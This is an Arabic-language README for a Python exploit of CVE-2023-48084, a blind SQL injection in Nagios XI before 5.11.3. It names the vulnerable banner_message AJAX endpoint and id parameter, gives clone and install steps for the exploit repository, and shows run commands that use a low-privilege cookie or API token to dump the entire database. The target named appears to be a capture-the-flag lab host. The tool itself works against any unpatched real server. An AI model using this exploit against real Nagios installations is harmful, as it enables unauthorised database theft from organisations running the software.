
برنامج بايثون لتفريغ جميع قواعد البيانات، من خلال استغلال ثغرة sqli في NagiosXI
استغلال Python لـ CVE-2023-48084 -> Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool.
يستخدم الاستغلال /admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(<SQL COMMAND TO EXECUTE>) لتنفيذ استعلامات SQL، ويستغل ثغرة حقن SQL عمياء...
استنسخ المستودع وقم بتثبيت متطلبات requirements.txt
git clone https://github.com/Hamibubu/CVE-2023-48084.git
cd CVE-2023-48084
pip install -r requirements.txt
الآن قم بتشغيل البرنامج، ستحتاج إلى كوكي جلسة بصلاحيات غير إدارية، أو رمز API، مثال
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -a <token>
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -c <cookie>
افتراضيًا، سيحاول تفريغ قاعدة البيانات بأكملها بدءًا من المخططات (schemas). إذا أردت أن يكون أسرع، فما عليك سوى الاطلاع على الكود وأخذ الجزء الذي تحتاجه.